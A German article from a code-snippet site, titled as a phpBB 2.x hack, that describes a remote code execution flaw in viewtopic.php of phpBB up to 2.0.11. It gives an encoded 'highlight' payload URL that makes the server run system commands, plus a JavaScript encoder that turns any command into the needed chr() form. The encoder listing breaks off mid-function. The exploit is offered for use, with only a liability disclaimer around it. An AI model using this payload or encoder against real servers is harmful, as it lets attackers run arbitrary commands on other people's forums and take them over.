Beim phpBB bis zur Version phpBB 2.0.11 kann man über einen Bug in der
viewtopic.php einen beliebigen Code ausführen.
Beschreibung:
Wenn man bei der viewtopic.php den String "highlight" mitsendet und
ihn entsprechent codiert kann man zum Beispiel auf einem Windows-Server (was zum
Glück nicht so oft) jeden Dos Befehl ausführen lassen den man will. Das
gleiche gilt natürlich auch für Linux.
Hier ein Beispiel: viewtopic.php?t=1&highlight=%2527%252esystem(chr(104)%252echr(101)%252echr(108)%252echr(112))%252e%2527
Der Codierte String wird von der viewtopic "entschlüsselt" und
verarbeitet. Dieses Beispiel sendet den harmlosen Befehl "help".
Um den String zu codieren gibt es dieses kleine Skript :
<script language="JavaScript">
<!--
function start()
{
var command = document.form.command.value;
var split = command.split("");
var array = new Array();
for (var a=0; a<command.length; a++){
if(a==command.length-1) {
var crypt = "chr("+split[a].charCodeAt()+")";
}
else {
var crypt = "chr("+split[a].charCodeAt()+")%252e";
}
array.push(crypt);
}
Hinweis
: Das lesen des Artikels Phpbb 2.xx Hack
- listings ID: 580
auf Dreamcodes,
sowie Link Verweise auf Internetseiten
fremder Anbieter erfolgen auf eigene Gefahr. Dreamcodes
haftet nicht für Schäden, die aus der Verwendung des
Inhaltes der Artikel erfolgen könnten. Schadenersatzansprüche, aus welchem
Rechtsgrund auch immer, sind ausgeschlossen !
Live Statistik
Datum: 22.11.2024
Uhrzeit: 02:27 Uhr
Online: 45 User
User heute: 4556
User allgem.: 35315213